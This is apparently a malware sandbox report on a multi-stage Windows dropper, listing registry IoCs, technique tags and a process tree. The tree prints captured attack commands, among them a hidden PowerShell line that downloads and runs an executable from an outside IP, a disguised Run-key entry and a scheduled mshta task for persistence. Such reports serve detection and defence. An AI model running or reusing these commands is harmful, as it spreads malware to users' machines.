Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x8b75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2b1895.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	588e9c47e5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3H13t.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ff96711009.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	90b8a075ab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	fe390939a4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	63b3bc936f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fe390939a4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	83c51029eb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	monthdragon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YMci4Rc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3Ypd8O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1M25d5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3Ypd8O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3H13t.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YMci4Rc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 17 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3H13t.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	588e9c47e5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	588e9c47e5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3H13t.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe

Delays execution with timeout.exe 2 IoCs

pid	Process
2228	timeout.exe
3236	timeout.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	76	Go-http-client/1.1

Kills process with taskkill 5 IoCs

pid	Process
2460	taskkill.exe
4268	taskkill.exe
2068	taskkill.exe
1064	taskkill.exe
4496	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844686547582435"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings	firefox.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
4044	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1628	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3268	schtasks.exe
5452	schtasks.exe
1260	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
864	1M25d5.exe
864	1M25d5.exe
1428	skotes.exe
1428	skotes.exe
3116	2b1895.exe
3116	2b1895.exe
3116	2b1895.exe
3116	2b1895.exe
3116	2b1895.exe
3116	2b1895.exe
3592	3H13t.exe
3592	3H13t.exe
3592	3H13t.exe
3592	3H13t.exe
3592	3H13t.exe
3592	3H13t.exe
3724	chrome.exe
3724	chrome.exe
3592	3H13t.exe
3592	3H13t.exe
3592	3H13t.exe
3592	3H13t.exe
4864	YMci4Rc.exe
4864	YMci4Rc.exe
4864	YMci4Rc.exe
4864	YMci4Rc.exe
4284	msedge.exe
4284	msedge.exe
4532	msedge.exe
4532	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
5088	9aiiMOQ.exe
5088	9aiiMOQ.exe
5088	9aiiMOQ.exe
5088	9aiiMOQ.exe
3264	NL58452.exe
3264	NL58452.exe
3264	NL58452.exe
3264	NL58452.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
3592	3H13t.exe
3592	3H13t.exe
2440	1M25d5.exe
2440	1M25d5.exe
4060	2b1895.exe
4060	2b1895.exe
4060	2b1895.exe
4060	2b1895.exe
4060	2b1895.exe
4060	2b1895.exe
3868	3H13t.exe
3868	3H13t.exe
2260	yOO5EOR.exe
2260	yOO5EOR.exe
2260	yOO5EOR.exe
4928	built anti vm.exe
4928	built anti vm.exe
4928	built anti vm.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
4532	msedge.exe
4532	msedge.exe
3824	chrome.exe
3824	chrome.exe
3824	chrome.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3724	chrome.exe
Token: SeCreatePagefilePrivilege	3724	chrome.exe
Token: SeShutdownPrivilege	3724	chrome.exe
Token: SeCreatePagefilePrivilege	3724	chrome.exe
Token: SeShutdownPrivilege	3724	chrome.exe
Token: SeCreatePagefilePrivilege	3724	chrome.exe
Token: SeShutdownPrivilege	3724	chrome.exe
Token: SeCreatePagefilePrivilege	3724	chrome.exe
Token: SeShutdownPrivilege	3724	chrome.exe
Token: SeCreatePagefilePrivilege	3724	chrome.exe
Token: SeShutdownPrivilege	3724	chrome.exe
Token: SeCreatePagefilePrivilege	3724	chrome.exe
Token: SeShutdownPrivilege	3724	chrome.exe
Token: SeCreatePagefilePrivilege	3724	chrome.exe
Token: SeDebugPrivilege	2260	yOO5EOR.exe
Token: SeDebugPrivilege	4928	built anti vm.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	3868	tasklist.exe
Token: SeDebugPrivilege	4168	Update.exe
Token: SeDebugPrivilege	2388	taskmgr.exe
Token: SeSystemProfilePrivilege	2388	taskmgr.exe
Token: SeCreateGlobalPrivilege	2388	taskmgr.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	1340	TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
Token: SeSecurityPrivilege	2388	taskmgr.exe
Token: SeTakeOwnershipPrivilege	2388	taskmgr.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	4268	taskkill.exe
Token: SeDebugPrivilege	2068	taskkill.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	4496	taskkill.exe
Token: SeDebugPrivilege	3156	firefox.exe
Token: SeDebugPrivilege	3156	firefox.exe
Token: SeDebugPrivilege	7356	powershell.exe
Token: SeShutdownPrivilege	3824	chrome.exe
Token: SeCreatePagefilePrivilege	3824	chrome.exe
Token: SeShutdownPrivilege	3824	chrome.exe
Token: SeCreatePagefilePrivilege	3824	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
864	1M25d5.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
3724	chrome.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
396	3aac5dd9aa.exe
396	3aac5dd9aa.exe
396	3aac5dd9aa.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
396	3aac5dd9aa.exe
396	3aac5dd9aa.exe
396	3aac5dd9aa.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe
2388	taskmgr.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4168	Update.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe
3156	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3444 wrote to memory of 1464	3444	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe	86
PID 3444 wrote to memory of 1464	3444	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe	86
PID 3444 wrote to memory of 1464	3444	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe	86
PID 1464 wrote to memory of 864	1464	x8b75.exe	89
PID 1464 wrote to memory of 864	1464	x8b75.exe	89
PID 1464 wrote to memory of 864	1464	x8b75.exe	89
PID 864 wrote to memory of 1428	864	1M25d5.exe	92
PID 864 wrote to memory of 1428	864	1M25d5.exe	92
PID 864 wrote to memory of 1428	864	1M25d5.exe	92
PID 1464 wrote to memory of 3116	1464	x8b75.exe	93
PID 1464 wrote to memory of 3116	1464	x8b75.exe	93
PID 1464 wrote to memory of 3116	1464	x8b75.exe	93
PID 3444 wrote to memory of 3592	3444	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe	102
PID 3444 wrote to memory of 3592	3444	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe	102
PID 3444 wrote to memory of 3592	3444	c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe	102
PID 3592 wrote to memory of 3724	3592	3H13t.exe	103
PID 3592 wrote to memory of 3724	3592	3H13t.exe	103
PID 3724 wrote to memory of 2836	3724	chrome.exe	104
PID 3724 wrote to memory of 2836	3724	chrome.exe	104
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 1340	3724	chrome.exe	106
PID 3724 wrote to memory of 2628	3724	chrome.exe	107
PID 3724 wrote to memory of 2628	3724	chrome.exe	107
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108
PID 3724 wrote to memory of 2212	3724	chrome.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
"C:\Users\Admin\AppData\Local\Temp\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3444
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x8b75.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x8b75.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1464
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M25d5.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M25d5.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:864
  - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1428
    - - C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"
        5⤵
        Executes dropped EXE
        
        PID:1228
    - - C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1904
      - C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4864
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 948
        6⤵
        Program crash
        
        PID:4704
    - - C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5100
      - C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5088
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 948
        6⤵
        Program crash
        
        PID:2616
    - - C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1800
      - C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3264
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 932
        6⤵
        Program crash
        
        PID:3800
    - - C:\Users\Admin\AppData\Local\Temp\1087747001\yOO5EOR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087747001\yOO5EOR.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2260
      - C:\Users\Admin\AppData\Local\Temp\built anti vm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\built anti vm.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4928
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp5985.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp5985.tmp.bat
        7⤵
        
        PID:3932
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4044
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 4928"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3868
        
        C:\Windows\system32\find.exe
        
        find ":"
        8⤵
        
        PID:4136
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2228
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4168
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        9⤵
        
        PID:2212
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        10⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:4044
    - - C:\Users\Admin\AppData\Local\Temp\1087771101\3aac5dd9aa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087771101\3aac5dd9aa.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:396
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn hmpi5maeLd1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LL8i8Sfu.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:232
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn hmpi5maeLd1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\1LL8i8Sfu.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1260
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\1LL8i8Sfu.hta
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
